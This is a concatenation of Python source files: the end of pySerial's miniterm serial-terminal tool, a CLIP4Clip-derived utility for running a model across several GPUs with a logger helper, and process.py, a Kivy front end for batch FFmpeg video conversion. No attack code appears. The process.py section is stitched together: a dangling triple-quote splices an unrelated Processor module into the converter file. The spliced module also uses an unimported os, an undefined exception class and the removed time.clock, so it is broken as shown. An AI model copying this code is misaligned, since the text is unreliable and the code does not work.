break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} change encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
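# For example, a wrapper script might do (sketch; the port name below is
# illustrative only):
#   from serial.tools.miniterm import main
#   main(default_port='/dev/ttyUSB0', default_baudrate=115200)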
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
        parser.error('--exit-char cannot be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
utils.py
|
# Adapted from: https://github.com/ArrowLuo/CLIP4Clip/blob/master/util.py
import torch
import torch.nn as nn
import threading
from torch._utils import ExceptionWrapper
import logging
def get_a_var(obj):
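    # Recursively search a tensor / list / tuple / dict structure for the
    # first torch.Tensor; parallel_apply uses it to find an input's device.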
if isinstance(obj, torch.Tensor):
return obj
    if isinstance(obj, (list, tuple)):
for result in map(get_a_var, obj):
if isinstance(result, torch.Tensor):
return result
if isinstance(obj, dict):
for result in map(get_a_var, obj.items()):
if isinstance(result, torch.Tensor):
return result
return None
def parallel_apply(fct, model, inputs, device_ids):
modules = nn.parallel.replicate(model, device_ids)
assert len(modules) == len(inputs)
lock = threading.Lock()
results = {}
grad_enabled = torch.is_grad_enabled()
def _worker(i, module, input):
torch.set_grad_enabled(grad_enabled)
device = get_a_var(input).get_device()
try:
with torch.cuda.device(device):
# this also avoids accidental slicing of `input` if it is a Tensor
if not isinstance(input, (list, tuple)):
input = (input,)
output = fct(module, *input)
with lock:
results[i] = output
except Exception:
with lock:
results[i] = ExceptionWrapper(where="in replica {} on device {}".format(i, device))
if len(modules) > 1:
threads = [threading.Thread(target=_worker, args=(i, module, input))
for i, (module, input) in enumerate(zip(modules, inputs))]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
else:
_worker(0, modules[0], inputs[0])
outputs = []
for i in range(len(inputs)):
output = results[i]
if isinstance(output, ExceptionWrapper):
output.reraise()
outputs.append(output)
return outputs
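# Usage sketch (illustrative, not part of the original module): each replica
# of a small model scores one shard of inputs on its own GPU. The model, the
# shapes and the `score` helper are hypothetical, and at least two visible
# CUDA devices are assumed.
#
#   model = nn.Linear(8, 1).cuda(0)
#
#   def score(module, x):          # fct receives (replica, *per_device_input)
#       return module(x)
#
#   inputs = [torch.randn(4, 8, device='cuda:0'),
#             torch.randn(4, 8, device='cuda:1')]
#   outputs = parallel_apply(score, model, inputs, device_ids=[0, 1])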
def get_logger(filename=None):
logger = logging.getLogger('logger')
logger.setLevel(logging.DEBUG)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
if filename is not None:
handler = logging.FileHandler(filename)
handler.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logging.getLogger().addHandler(handler)
return logger
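# Minimal self-test (illustrative): get_logger() alone logs INFO+ to stderr;
# passing a filename additionally writes DEBUG+ records to that file.
if __name__ == '__main__':
    log = get_logger()
    log.info('utils module loaded OK')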
|
process.py
|
'''Video Processing
=====================
Provides a class that manipulates files en-masse using FFmpeg. It can
compress/uncompress/merge/concatenate or perform other tasks on video files.
In order to use this module, the ffmpeg binaries need to be installed in the
parent directory of this module, or in $(FFMPEG_ROOT)/bin.
Keyboard Keys
-------------
`space`:
Toggles the current pause state.
`enter`:
Starts processing.
`escape`:
Stop the processing.
'''
import sys
import json
from os import makedirs
from os.path import join, exists, expanduser, abspath, isdir, isfile, dirname,\
split, splitext, getsize, sep
import logging
from threading import Thread
import time
from functools import partial
import traceback
import subprocess as sp
import tempfile
import re
from re import match, escape, sub
from time import sleep
from collections import defaultdict
from kivy.clock import Clock
from kivy.compat import clock
from kivy.factory import Factory
from kivy.uix.behaviors.knspace import KNSpaceBehavior
from kivy.uix.gridlayout import GridLayout
from kivy.uix.popup import Popup
from kivy.logger import Logger
from kivy.event import EventDispatcher
from kivy.properties import (NumericProperty, ReferenceListProperty,
ObjectProperty, ListProperty, StringProperty, BooleanProperty,
DictProperty, AliasProperty, OptionProperty, ConfigParserProperty)
from cplcom import config_name
from filers.tools import (str_to_float, pretty_space, pretty_time, KivyQueue,
to_bool, ConfigProperty, byteify)
from filers import root_data_path
__all__ = ('VideoConverter', )
def exit_converter():
c = VideoConverterController.converter_singleton
if c:
try:
c.stop(terminate=True)
except:
pass
try:
c.save_config()
except Exception as e:
Logger.error('Converter: {}'.format(e))
Logger.exception(e)
class VideoConverterController(EventDispatcher):
settings_path = ConfigParserProperty(
join(root_data_path, 'converter.json'), 'Filers',
'converter_settings_path', config_name)
conversion_group_settings = ListProperty([])
conversion_group_widgets = []
converter_singleton = None
converter_view = ObjectProperty(None)
container = ObjectProperty(None)
res_container = ObjectProperty(None)
settings_display = None
current_group_i = None
files = []
processed = 0
processing = False
def __init__(self, **kwargs):
super(VideoConverterController, self).__init__(**kwargs)
VideoConverterController.converter_singleton = self
self.settings_display = Factory.ConverterSettings(controller=self)
self.load_config(self.settings_path)
self.conversion_group_settings = []
self.conversion_group_widgets = []
@staticmethod
def get_window_title():
c = VideoConverterController.converter_singleton
if not c or not c.files or len(c.files) == c.processed:
return ''
s = ' - Converter'
if not c.processed:
s += ' ({})'.format(len(c.files))
else:
            s += ' ({}/{})'.format(c.processed, len(c.files))
if not c.processing:
s += ' PAUSED'
return s
def log_error(self, msg=None, e=None, exc_info=None, level='error'):
q = self.converter_view.error_output.queue
l = getattr(Logger, level)
val = msg
if msg:
if e:
val = '{}: {}'.format(msg, repr(e))
l(val)
else:
l(msg)
if exc_info is not None:
Logger.error(e, exc_info=exc_info)
if val:
q.add_item(val)
def load_config(self, filename):
if not isfile(filename):
return
filename = abspath(filename)
for c in self.conversion_group_widgets[:]:
self.delete_group(c)
try:
with open(filename) as fh:
global_opt, convert_opt = json.load(fh)
global_opt, convert_opt = byteify(global_opt), byteify(convert_opt)
for k, v in global_opt.items():
setattr(self, k, v)
for d in convert_opt:
self.add_group(settings=d, show=False)
except Exception as e:
self.log_error(e=e, exc_info=sys.exc_info(), msg='Loading config')
else:
if filename:
self.settings_path = filename
def save_config(self, filename=None):
filename = filename or self.settings_path
if not filename:
return
try:
with open(filename, 'w') as fh:
json.dump(
(self.get_config_dict(), self.conversion_group_settings),
fh, sort_keys=True, indent=4, separators=(',', ': '))
except Exception as e:
            self.log_error(e=e, exc_info=sys.exc_info(), msg='Saving config')
else:
if filename:
self.settings_path = filename
def ui_config(self, load, path, selection, filename):
fname = abspath(join(path, filename))
if load:
self.load_config(fname)
else:
self.save_config(fname)
def get_config_dict(self):
attrs = []
return {k: getattr(self, k) for k in attrs}
def add_group(self, settings={}, show=True):
item = ConversionGroup(controller=self)
settings = self.settings_display.get_settings(settings)
self.conversion_group_widgets.append(item)
self.conversion_group_settings.append(settings)
self.container.add_widget(item)
if show:
self.show_settings(item)
def delete_group(self, item):
self.settings_display.dismiss()
i = self.conversion_group_widgets.index(item)
del self.conversion_group_settings[i]
del self.conversion_group_widgets[i]
self.container.remove_widget(item)
def show_settings(self, item):
self.settings_display.item = item
self.settings_display.open()
def stop(self, terminate=False):
pass
def update_item_settings(self, item, src):
pass
class ConversionGroup(KNSpaceBehavior, GridLayout):
controller = ObjectProperty(None, rebind=True)
in_ex_file = StringProperty('')
out_ex_file = StringProperty('')
class ConverterSettings(KNSpaceBehavior, Popup):
controller = ObjectProperty(None, rebind=True)
item = ObjectProperty(None, allownone=True)
def get_settings(self, settings={}):
s = {}
s.update(settings)
return s
def set_settings(self, settings={}):
pass
class VideoConverter(KNSpaceBehavior, GridLayout):
def __init__(self, **kwargs):
super(VideoConverter, self).__init__(**kwargs)
def init(*largs):
self.controller = VideoConverterController(
converter_view=self, container=self.ids.container,
res_container=self.ids.res_container)
Clock.schedule_once(init, 0)
controller = ObjectProperty(None, rebind=True)
"""
unicode_type = unicode if PY2 else str
'''
Unicode type used to convert anything into unicode.
'''
ConfigProperty = partial(ConfigProperty, section='Processor',
config_name=config_name)
'''
A partially initialized :py:class:`~kivy.properties.ConfigParserProperty`.
The section name is `'Processor'` and the Config class name is
:attr:`~filers.config_name`.
'''
class Processor(GridLayout):
'''
See module description.
'''
queue = None
''' The :class:`~filers.tools.KivyQueue` with which we communicate with the
kivy event loop. The work thread sends updates to Kivy with this queue.
Following is the list of queue keys that can be sent, along with their
possible values.
`clean`: None
Sent when the threads starts.
`count`: int
Sent periodically while pre-reading the input files describing
the files read so far. It's a 5-tuple of: # output files,
# input files, # of walked directories, total size of the input
files, and a dictionary where the keys are ignored files, or
        extension types (e.g. .txt) and their values are the number of
times they were ignored.
`count_done`: int
Identical to `count`, except it's sent when the count is done.
`failure`: str
Sent when something went wrong and the threads ends. The
value is a string with the reason for the failure. Upon failure,
the controller should call stop and set itself in stopped mode.
`file_cmd`: str
Sent for every file before it is processed. It's a string
containing the full command with which FFmpeg will be called.
`file_stat`: 11-tuple
Sent after each file that has been processed (e.g. moved)
containing status information. It's a 11-tuple of: the total size
of output files processed, the estimated total size of all the
output files, the total size of input files processed, the total
size of all the input files (can change dynamically as files are
skipped), the total number of input files processed, the count of
all the input files, the total number of output files processed,
the count of all the output files, the estimated bps at which
things are done, the total time elapsed, the estimated time left.
`skipped`: str
Sent when the file is skipped due to error. The
string describes the files involved and the reason.
`done`: None
        Sent when the thread has completed its work.
'''
thread = None
''' The thread that runs our secondary thread. All disk R/W and processing
is done from that thread. See :attr:`process_thread`. Defaults to None.
'''
ffmpeg_path = ''
''' The full path to the FFmpeg executable. To find it, it looks in the
same path that :py:mod:`ffpyplayer` looks for the binaries
(`FFMPEG_ROOT` in os.environ as well as the parent directory of this file).
'''
running = False
''' Whether the thread is running. It is set to True before launching the
thread, and the thread resets it to False before exiting. Defaults to
False. See :attr:`process_thread`.
'''
finish = False
''' When set to True, it signals the thread to terminate. Defaults to
False.
'''
pause = False
''' When set to True, it signals the thread to pause. Setting to False will
un-pause. Defaults to False.
'''
report = ''
''' A text report of the files to be processed and ignored. This is
generated before any processing occurs. Defaults to `''`.
'''
error_list = []
''' A list of text items, each item representing a file that failed to be
processed. It is updated dynamically. Defaults to `[]`.
'''
success_list = []
''' A list of text items, each item representing a file that was
successfully processed. It is updated dynamically. Defaults to `[]`.
'''
input_split_pat = re.compile('''((?:[^,"']|"[^"]*"|'[^']*')+)''')
''' The compiled pattern we use to break apart the list of input files to
    process. It splits on commas while keeping quoted names intact.
'''
input = ConfigProperty(u'', 'input', unicode_type)
''' The list of input files and folders to be processed. It is
a comma (plus optional spaces) separated list. File or directory names
that contain a space, should be quoted with `"`. Triple clicking on this
field will launch a file browser.
Defaults to `u''`.
'''
simple_filt = ConfigProperty(True, 'simple_filt', to_bool)
''' Whether the filter we use to filter the input files with
uses the simple common format (where * - match anything, ? match any single
char), if True. If False, it's a python regex string. Defaults to True.
'''
input_filter = ConfigProperty(u'*.avi', 'input_filter', unicode_type)
''' The filter to use to filter the input files. See
:attr:`simple_filt`. Defaults to `'*.avi'`.
'''
group_filt = ConfigProperty(u'', 'group_filt', unicode_type)
''' The matching string parts to remove to get the output
filename. If :attr:`simple_filt` is True, it uses `*` to match any group
of chars, and `?` to match a single char. If :attr:`simple_filt` is
False, it uses a python regex for the matching. This really only
makes sense with a regex. This is mostly useful when merging
files.
For example, say we have two files called `Video file1.avi`,
and `Video file2.avi`, and we wish to merge them into a new file
called `Video file.avi`. Then :attr:`group_filt` will be
`'(?<=file).+(?=\.avi)'`. This uses positive and negative lookahead
assertions to match the number, which then gets removed in
processing. Defaults to `''`.
If multiple input files match the same output filename, those files
will be merged using the :attr:`merge_type` mode.
'''
input_start = ConfigProperty(0., 'input_start', float)
''' The time in seconds to seek into the video. If specified,
the output video file will not have the first :attr:`input_start` seconds
of the original file. Defaults to `0`.
'''
input_end = ConfigProperty(0., 'input_end', float)
''' The duration of the output video file. If specified,
the output video file will start at :attr:`input_start` (or zero if not
specified) seconds and only copy the following :attr:`input_end` seconds.
If zero, it'll not cut anything. Defaults to `0`.
'''
merge_type = ConfigProperty(u'none', 'merge_type', unicode_type)
''' If multiple input files match the same output filename as
specified with :attr:`group_filt`, those files will be merged using the
mode specified here. Possible modes are `none`, `overlay`, or
`concatenate`. Defaults to `none`.
`none`
If multiple input files are specified for a single output
file, an error is raised.
`overlay`
The output video files will be overlaid, side by side, on
a single output video file. A maximum of 4 input files is
supported for any single output file.
`concatenate`
The files will be concatenated, one after another in series.
'''
out_overwrite = ConfigProperty(False, 'out_overwrite', to_bool)
    ''' Whether an output file will overwrite an already
    existing file with that name. If False, the file will be
    considered an error and skipped. Defaults to False.
'''
out_audio = ConfigProperty(False, 'out_audio', to_bool)
''' Whether the audio should be included in the output file. If False, the
    output file will only have video, not audio. Defaults to False.
'''
out_codec = ConfigProperty(u'h264', 'out_codec', unicode_type)
''' The codec of the output file. This determines whether the output will
be compressed or uncompressed. Can be one of `raw`, `h264`. Defaults to
`h264`.
`raw`
The output file will be uncompressed.
`h264`
The output file will be compressed with h264.
'''
crf = ConfigProperty(u'18', 'crf', unicode_type)
''' How much the output file should be compressed, when :attr:`out_codec`
is `h264`. The valid numbers are between `18 - 28`. A larger
number means higher compression, and typically slower. A lower
number means less compression and better quality, but a larger
output file. Defaults to 18.
'''
compress_speed = ConfigProperty(u'veryfast', 'compress_speed',
unicode_type)
''' Similar to :attr:`crf`, but less effective. The faster
the compression, the lower the output quality. In practice,
`veryfast` seems to work well. Can be one of `ultrafast`,
`superfast`, `veryfast`, `faster`, `fast`, `medium`, `slow`,
`slower`, `veryslow`. Defaults to `veryfast`.
'''
num_threads = ConfigProperty(u'auto', 'num_threads', unicode_type)
''' The number of threads FFmpeg should use. Valid values are
`0`, or `auto`, in which case FFmpeg selects the optimum number. Or
any integer. The integer should probably not be larger than the
number of cores on the machine.
'''
out_append = ConfigProperty(u'', 'out_append', unicode_type)
''' A string that gets appended to the output filename. See
:attr:`output`. Defaults to `''`.
'''
add_command = ConfigProperty(u'', 'add_command', unicode_type)
''' An additional string that could be used to add any
commands to the FFmpeg command line. Defaults to `''`.
'''
output = ConfigProperty(u'', 'output', unicode_type)
''' The output directory where the output files are saved. For
input files specified directly, they are placed directly in this
directory. For input directories, for all the files and subfiles,
their root directory specified is replaced with this directory, so
that the output will have the same tree structure as the input.
Each output filename will be a directory, followed by the input
filename without the extension, with all matches to :attr:`group_filt`
deleted. Followed by the :attr:`out_append` string and finally followed
by the extension, which is `.avi` if :attr:`out_codec` is `raw`,
otherwise it's '.mp4'. Defaults to `''`.
'''
pre_process = ConfigProperty(u'', 'pre_process', unicode_type)
'''
When specified, we run the command given in :attr:`pre_process`, where
the first instance of `{}` in :attr:`pre_process` is replaced by the
source filename (the first, if there's more than one source file for this
output file). This command is run from an internally created second
process. Example commands is::
ffprobe {}
which will run ffprobe on the input file. The output of this command will
be used with :attr:`pre_process_pat`.
'''
pre_process_pat = ConfigProperty(u'', 'pre_process_pat', unicode_type)
'''
When :attr:`pre_process` is provided, we use this pattern to process the
output of that command. For the first step, we use the
:attr:`pre_process_pat` python regex to match the output of
:attr:`pre_process`. If the output doesn't match the pattern, that file is
skipped.
If the output matches, in the next step, we call the python format method
on the final ffmpeg command that will be executed, where the arguments to
the format method is the groups of the match object generated from the
regex match. That formatted string is then used as the executed string.
'''
pause_on_skip = ConfigProperty(5, 'pause_on_skip', int)
'''
If :attr:`pause_on_skip` files have been skipped, we'll pause. If -1, we
don't pause.
'''
_last_update = 0.
''' The last time we received a file_stat queue packet or we updated the
title. '''
_last_time = 0.
''' The estimated remaining time from the last time that we received a
file_stat key in the :attr:`queue`. '''
remaining_time = StringProperty('')
''' The estimated remaining time to finish processing. '''
percent_done = NumericProperty(0.)
''' The estimated percent files done, estimated from the input/output
file sizes. '''
count_status = StringProperty('')
''' A string of the current counting status when the files are enumerated.
'''
proc_status = StringProperty('')
''' A string of the current processing status when the files are processed.
'''
ignored_list = StringProperty('')
''' A string of the input files ignored. '''
rate = StringProperty('')
''' The current byte rate at which files are being processed. '''
cmd = StringProperty('')
''' The most recent command line executed. '''
done_reason = StringProperty('')
''' The reason why processing stopped. Can be an error, or if it finished
successfully.
'''
skip_count = NumericProperty(0)
''' The total number of input files skipped. '''
error_log = StringProperty('')
''' A string of all the errors encountered so far. '''
ext_running = BooleanProperty(False)
''' Whether the processing is currently running (even when paused). '''
paused = BooleanProperty(False)
''' Whether the processing is currently paused. '''
go_wgt = ObjectProperty(None)
''' The button widget that starts processing. '''
pause_wgt = ObjectProperty(None)
''' The button widget that pauses processing. '''
def get_status(self):
skipped = ('Skipped {:d}, '.format(self.skip_count)
if self.skip_count else '')
prefix = running = ''
rate = self.rate
done_reason = self.done_reason
if rate:
prefix = ' - '
if done_reason:
dc = ('[color=00FF00]' if done_reason == 'Done!'
else '[color=FF0000]')
running = '{}{}{}[/color]'.format(prefix, dc, self.done_reason)
elif self.paused:
running = '{}[color=F7FF00]paused[/color]'.format(prefix)
elif self.ext_running:
running = '{}[color=00FF00]running[/color]'.format(prefix)
s = '{}\n{}\n{}{}{}'.format(self.count_status, self.proc_status,
skipped, self.rate, running)
return s
status = AliasProperty(get_status, None, bind=('skip_count', 'done_reason',
'count_status', 'proc_status', 'rate', 'ext_running', 'paused'))
''' A pretty string describing the current status.
'''
def get_title(self):
if self.ext_running:
paused = self.paused
if not paused:
self.remaining_time = pretty_time(max(0, self._last_time -
(time.clock() - self._last_update)))
return ' Processing - {}'.format(self.remaining_time)
self._last_update = time.clock()
return ' Processing - {}, Paused'.format(self.remaining_time)
else:
return ''
window_title = AliasProperty(get_title, None)
''' The window title when this widget has focus.
'''
def __init__(self, **kwargs):
super(Processor, self).__init__(**kwargs)
self.queue = KivyQueue(Clock.create_trigger(self.read_queue))
self._last_update = time.clock()
if 'FFMPEG_ROOT' in os.environ and\
exists(join(os.environ['FFMPEG_ROOT'], 'bin')):
base_path = abspath(join(os.environ['FFMPEG_ROOT'], 'bin'))
else:
base_path = abspath(dirname(dirname(__file__)))
ffmpeg_path = join(base_path, 'ffmpeg')
if exists(ffmpeg_path + '.exe') and isfile(ffmpeg_path + '.exe'):
ffmpeg_path += '.exe'
elif not (exists(ffmpeg_path) and isfile(ffmpeg_path)):
ffmpeg_path = ''
if not ffmpeg_path:
logging.exception('Processor: Cannot find ffmpeg binary.')
self.ffmpeg_path = ffmpeg_path
def __del__(self):
self.stop()
def read_queue(self, *largs):
'''
The method that is called by the Kivy thread when it's notified by the
internal thread of updates. It reads the :attr:`queue` and process any
waiting updates.
'''
queue = self.queue
while 1:
try:
key, val = queue.get()
except KivyQueue.Empty:
return
if key == 'failure':
self.done_reason = val
self.go_wgt.state = 'normal'
elif key == 'clean':
self.count_status = ''
self.remaining_time = ''
self.percent_done = 0.
self.ignored_list = ''
self.rate = ''
self.cmd = ''
self.done_reason = ''
self.error_log = ''
self.skip_count = 0
elif key.startswith('count'):
c_out, count_in, dir_count, size, ignored = val
count_done = ''
if key == 'count_done':
count_done = ' [color=00FF00]DONE![/color]'
ig = ''
if ignored:
ig = ('(ignored [color=FF00C4]{:d}[/color]) '
.format(sum(ignored.values())))
bg = '[color=00FF00]'
by = '[color=F7FF00]'
a = '[/color]'
self.count_status = ('Counting: {}{:d}{} files &bl;{}{}{}&br;,'
' {}{:d}{} directories {}--> {}{:d}{} files.{}'.format(bg,
count_in, a, by, pretty_space(size), a, by, dir_count, a, ig,
by, c_out, a, count_done))
self.ignored_list = '\n'.join(['{}:\t\t{:d}'.format(k, v)
.expandtabs() for k, v in dict(ignored).iteritems()])
elif key == 'file_cmd':
self.cmd = val
elif key == 'done':
self.done_reason = 'Done!'
self.go_wgt.state = 'normal'
elif key == 'file_stat':
self._last_time = val[-1]
self._last_update = time.clock()
self.remaining_time = pretty_time(val[-1])
self.percent_done = val[2] / float(val[3])
bg = '[color=00FF00]'
by = '[color=F7FF00]'
a = '[/color]'
self.proc_status = ('Processing: {}{:d}{} files &bl;{}{}{}&br;'
' --> {}{:d}{} &bl;{}{}{} / {}{}{}&br; '.format(by, val[4], a,
by, pretty_space(val[2]), a, bg, val[6], a, bg,
pretty_space(val[0]), a, bg, pretty_space(val[1]), a))
self.rate = ('[color=CDFF00]{}, {} sec[/color]'.
format(pretty_space(val[-3], is_rate=True),
pretty_time(val[-2])))
elif key == 'skipped':
self.error_log += '\n\n{}'.format(val)
self.skip_count += 1
if self.skip_count == self.pause_on_skip:
self.pause_wgt.state = 'down'
def on_keyboard_down(self, keyboard, keycode, text, modifiers):
''' Method called by the Kivy thread when a key in the keyboard is
pressed.
'''
if keycode[1] == 'spacebar':
self.pause_wgt.state = ('down' if self.pause_wgt.state ==
'normal' else 'normal')
elif keycode[1] == 'enter':
self.go_wgt.state = 'down'
elif keycode[1] == 'escape':
self.go_wgt.state = 'normal'
else:
return False
return True
def on_keyboard_up(self, keyboard, keycode):
''' Method called by the Kivy thread when a key in the keyboard is
released.
'''
return False
def save_report(self):
''' Saves a report of what was processed up to now. See
:attr:`report`, :attr:`error_list`.
The report includes the list of files to be processed, and once
processing started, also the list of files that failed.
If :attr:`output` is a directory, the
file will be saved there, otherwise it's saved to the users main
directory. The report filename starts with ffmpeg_process_report and
ends with .txt.
'''
odir = self.output
if not isdir(odir):
odir = dirname(odir)
if (not odir) or not isdir(odir):
odir = expanduser('~')
odir = abspath(odir)
(fd, _) = tempfile.mkstemp(suffix='.txt',\
prefix='ffmpeg_process_report_', dir=odir)
try:
f = os.fdopen(fd, 'wb')
except:
(fd, _) = tempfile.mkstemp(suffix='.txt',
prefix='ffmpeg_process_report_', dir=expanduser('~'))
try:
f = os.fdopen(fd, 'wb')
except:
return
f.write(self.report)
f.write('Success list:\n')
for s in self.success_list:
f.write(s)
f.write('\n')
f.write('Error list:\n')
for err in self.error_list:
f.write(err)
f.write('\n')
f.close()
def start(self):
        ''' Starts the processing.
This launches the second thread that does the disk I/O and starts
processing the files according to the settings. If it is already
running, it does nothing.
:return:
True, if it successfully started, False otherwise.
'''
if self.running and self.thread and self.thread.is_alive():
return
self.stop()
self.running = True
try:
self.thread = Thread(target=self.process_thread, name='Processor')
self.thread.start()
except:
logging.error('Processor: Thread failed:\n' +
traceback.format_exc())
self.stop()
return False
return True
def toggle_pause(self):
''' Changes whether the thread is paused or running to the opposite
of its current state.
'''
self.pause = not self.pause
return self.pause
def stop(self):
''' Asks the processing thread started with :meth:`start` to end.
This will cause processing to stop.
'''
self.finish = True
while self.running and self.thread and self.thread.is_alive():
time.sleep(0.05)
self.running = False
self.thread = None
self.finish = False
def enumerate_files(self):
''' Returns an iterator that walks all the input files and directories
to return the files to be processed according to the current
configuration.
It walks all the input files and directories, and for every input file
generates a corresponding output file using the specified output.
Multiple input files can be assigned to a single output file, in which
case they are merged according to :attr:`merge_type`.
:returns:
A 5-tuple of: a dictionary where keys are output files and
            values are lists of 2-tuples, where each 2-tuple is an input file
            and its size. The number of files processed, the number of directories
processed, the total size of the files processed, and a dictionary
of ignored files (see `count` in :attr:`queue`). On the final
iteration, it returns a sorted list of 2-tuples of the output files
dictionary items.
:raises FilerException:
            When the config is invalid, an exception is raised.
'''
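        # This method is a generator: it yields running (files, count, dirs,
        # size, ignored) progress tuples while walking, then finally yields
        # the sorted (output, inputs) item list.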
files_out = defaultdict(list)
odir = self.output
if not isdir(odir):
raise FilerException('{} is not an output directory.'.\
format(self.output))
odir = abspath(odir)
ext_out = '.mp4' if self.out_codec == 'h264' else '.avi'
filt_in = self.input_filter
filt_group = self.group_filt
if self.simple_filt:
filt_in = sub(escape('\\?'), '.', sub(escape('\\*'), '.*',
escape(filt_in)))
filt_group = sub(escape('\\?'), '.', sub(escape('\\*'), '.*',
escape(filt_group)))
try:
filt_in = re.compile(filt_in)
filt_group = re.compile(filt_group)
except:
raise FilerException('invalid filtering pattern')
apnd = self.out_append
ignored = defaultdict(int)
src_list = [f.strip(''', '"''') for f in
self.input_split_pat.split(self.input)]
src_list = [abspath(f) for f in src_list if f]
count = 0
dir_count = 0
size = 0
for f in src_list:
if isfile(f) and match(filt_in, f):
sz = getsize(f)
